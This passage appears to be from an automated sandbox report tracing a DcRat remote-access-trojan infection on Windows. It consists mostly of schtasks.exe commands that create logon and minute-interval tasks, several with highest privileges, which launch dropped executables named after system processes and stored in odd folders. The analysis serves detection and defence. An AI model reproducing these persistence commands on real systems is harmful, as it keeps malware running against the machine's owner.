                                                                                                                PID:3360
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:236
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:688
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:1080
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:3948
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2020
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\winNet\csrss.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2180
                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                1⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Enumerates connected drives
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Drops file in Windows directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2244
                                                                                                                • C:\Windows\System32\MsiExec.exe
                                                                                                                  C:\Windows\System32\MsiExec.exe -Embedding 72D546C1C009FBAD33D0C62C335D404B
                                                                                                                  2⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5196
                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding D7827AE264A1B4E54F8084EDAAD5B4C7
                                                                                                                  2⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5364
                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 29076F552ABCCBE5E901A67AAD367FC1 E Global\MSI0000
                                                                                                                  2⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5556
                                                                                                                  • C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                    "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"
                                                                                                                    3⤵
                                                                                                                      PID:5884
                                                                                                                      • C:\Windows\System32\wevtutil.exe
                                                                                                                        "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                                                                                                                        4⤵
                                                                                                                          PID:5832
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:3352
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\winNet\csrss.exe'" /rl HIGHEST /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:848
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'" /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:4568
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'" /rl HIGHEST /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:4632
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'" /rl HIGHEST /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:5004
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:4116
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:2064
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:5272
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:5996
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:5152
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                    1⤵
                                                                                                                    • DcRat
                                                                                                                    • Process spawned unexpected child process
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:2692
                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:5772
                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:5912
                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:4972
                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:5604
                                                                                                                          • C:\winNet\explorer.exe
                                                                                                                            C:\winNet\explorer.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4568
                                                                                                                            • C:\winNet\explorer.exe.exe
                                                                                                                              "C:\winNet\explorer.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5740
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2692
                                                                                                                          • C:\Users\Default\SendTo\sppsvc.exe
                                                                                                                            C:\Users\Default\SendTo\sppsvc.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5364
                                                                                                                            • C:\Users\Default\SendTo\sppsvc.exe.exe
                                                                                                                              "C:\Users\Default\SendTo\sppsvc.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2652
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2932
                                                                                                                          • C:\Program Files\Internet Explorer\Registry.exe
                                                                                                                            "C:\Program Files\Internet Explorer\Registry.exe"
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:3696
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4724
                                                                                                                            • C:\Program Files\Internet Explorer\Registry.exe.exe
                                                                                                                              "C:\Program Files\Internet Explorer\Registry.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3004
                                                                                                                          • C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe
                                                                                                                            "C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4660
                                                                                                                            • C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe
                                                                                                                              "C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3156
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4252
                                                                                                                          • C:\winNet\csrss.exe
                                                                                                                            C:\winNet\csrss.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2012
                                                                                                                            • C:\winNet\csrss.exe.exe
                                                                                                                              "C:\winNet\csrss.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3220
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5964
                                                                                                                          • C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe
                                                                                                                            "C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:484
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2960
                                                                                                                            • C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe
                                                                                                                              "C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5172
                                                                                                                          • C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1296
                                                                                                                            • C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1140
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3728
                                                                                                                          • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                            C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5488
                                                                                                                          • C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe
                                                                                                                            C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5444
                                                                                                                            • C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe
                                                                                                                              "C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1916
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3908
                                                                                                                          • C:\winNet\explorer.exe
                                                                                                                            C:\winNet\explorer.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5164
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2012
                                                                                                                            • C:\winNet\explorer.exe.exe
                                                                                                                              "C:\winNet\explorer.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1100
                                                                                                                          • C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe
                                                                                                                            "C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe"
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4008
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5444
                                                                                                                            • C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe
                                                                                                                              "C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2652
                                                                                                                          • C:\winNet\winlogon.exe
                                                                                                                            C:\winNet\winlogon.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5956
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3100
                                                                                                                            • C:\winNet\winlogon.exe.exe
                                                                                                                              "C:\winNet\winlogon.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5032
                                                                                                                          • C:\Users\Default\SendTo\sppsvc.exe
                                                                                                                            C:\Users\Default\SendTo\sppsvc.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:720
                                                                                                                            • C:\Users\Default\SendTo\sppsvc.exe.exe
                                                                                                                              "C:\Users\Default\SendTo\sppsvc.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4972
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4576
                                                                                                                          • C:\Program Files\Internet Explorer\Registry.exe
                                                                                                                            "C:\Program Files\Internet Explorer\Registry.exe"
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:132
                                                                                                                            • C:\Program Files\Internet Explorer\Registry.exe.exe
                                                                                                                              "C:\Program Files\Internet Explorer\Registry.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1956
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1888
                                                                                                                          • C:\DriversavessessionDlldhcp\Roblox.exe
                                                                                                                            C:\DriversavessessionDlldhcp\Roblox.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:3156
                                                                                                                          • C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe
                                                                                                                            "C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4784
                                                                                                                            • C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe
                                                                                                                              "C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4948
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5312
                                                                                                                          • C:\winNet\csrss.exe
                                                                                                                            C:\winNet\csrss.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5856
                                                                                                                            • C:\winNet\csrss.exe.exe
                                                                                                                              "C:\winNet\csrss.exe.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1992
                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                              2⤵
                                                                                                                                PID:1388
                                                                                                                            • C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe
                                                                                                                              "C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3364
                                                                                                                              • C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe
                                                                                                                                "C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"
                                                                                                                                2⤵
                                                                                                                                  PID:572
                                                                                                                                • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                  2⤵
                                                                                                                                    PID:5656
                                                                                                                                • C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"
                                                                                                                                  1⤵
                                                                                                                                    PID:5928
                                                                                                                                    • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:5340
                                                                                                                                      • C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"
                                                                                                                                        2⤵
                                                                                                                                          PID:5280
                                                                                                                                      • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5016
                                                                                                                                        • C:\winNet\explorer.exe
                                                                                                                                          C:\winNet\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:2652
                                                                                                                                            • C:\winNet\explorer.exe.exe
                                                                                                                                              "C:\winNet\explorer.exe.exe"
                                                                                                                                              2⤵
                                                                                                                                                PID:2976
                                                                                                                                              • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                2⤵
                                                                                                                                                  PID:4116
                                                                                                                                              • C:\Program Files\Internet Explorer\Registry.exe
                                                                                                                                                "C:\Program Files\Internet Explorer\Registry.exe"
                                                                                                                                                1⤵
                                                                                                                                                  PID:2356
                                                                                                                                                  • C:\Program Files\Internet Explorer\Registry.exe.exe
                                                                                                                                                    "C:\Program Files\Internet Explorer\Registry.exe.exe"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2708
                                                                                                                                                    • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:6084
                                                                                                                                                    • C:\Users\Default\SendTo\sppsvc.exe
                                                                                                                                                      C:\Users\Default\SendTo\sppsvc.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5912
                                                                                                                                                        • C:\Users\Default\SendTo\sppsvc.exe.exe
                                                                                                                                                          "C:\Users\Default\SendTo\sppsvc.exe.exe"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4288
                                                                                                                                                          • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3976
                                                                                                                                                          • C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe
                                                                                                                                                            C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2460
                                                                                                                                                              • C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe
                                                                                                                                                                "C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2000
                                                                                                                                                                • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4624
                                                                                                                                                                • C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe
                                                                                                                                                                  "C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3312
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4376
                                                                                                                                                                      • C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe
                                                                                                                                                                        "C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:6056
                                                                                                                                                                      • C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe
                                                                                                                                                                        "C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe"
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5572
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1296
                                                                                                                                                                            • C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe
                                                                                                                                                                              "C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3884
                                                                                                                                                                            • C:\winNet\csrss.exe
                                                                                                                                                                              C:\winNet\csrss.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5900
                                                                                                                                                                                • C:\winNet\csrss.exe.exe
                                                                                                                                                                                  "C:\winNet\csrss.exe.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5280
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5844
                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4296
                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe
                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5572
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2392
                                                                                                                                                                                        • C:\winNet\explorer.exe
                                                                                                                                                                                          C:\winNet\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:1700
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4660
                                                                                                                                                                                              • C:\winNet\explorer.exe.exe
                                                                                                                                                                                                "C:\winNet\explorer.exe.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4064
                                                                                                                                                                                              • C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe
                                                                                                                                                                                                "C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe"
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:2600
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4740
                                                                                                                                                                                                    • C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe
                                                                                                                                                                                                      "C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe.exe"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2372
                                                                                                                                                                                                    • C:\winNet\winlogon.exe
                                                                                                                                                                                                      C:\winNet\winlogon.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:3480
                                                                                                                                                                                                        • C:\winNet\winlogon.exe.exe
                                                                                                                                                                                                          "C:\winNet\winlogon.exe.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1460
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4628
                                                                                                                                                                                                          • C:\Program Files\Internet Explorer\Registry.exe
                                                                                                                                                                                                            "C:\Program Files\Internet Explorer\Registry.exe"
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:1928
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:3200
                                                                                                                                                                                                                • C:\Program Files\Internet Explorer\Registry.exe.exe
                                                                                                                                                                                                                  "C:\Program Files\Internet Explorer\Registry.exe.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:3540
                                                                                                                                                                                                                • C:\DriversavessessionDlldhcp\Roblox.exe
                                                                                                                                                                                                                  C:\DriversavessessionDlldhcp\Roblox.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2308
                                                                                                                                                                                                                  • C:\Users\Default\SendTo\sppsvc.exe
                                                                                                                                                                                                                    C:\Users\Default\SendTo\sppsvc.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:4708
                                                                                                                                                                                                                      • C:\Users\Default\SendTo\sppsvc.exe.exe
                                                                                                                                                                                                                        "C:\Users\Default\SendTo\sppsvc.exe.exe"
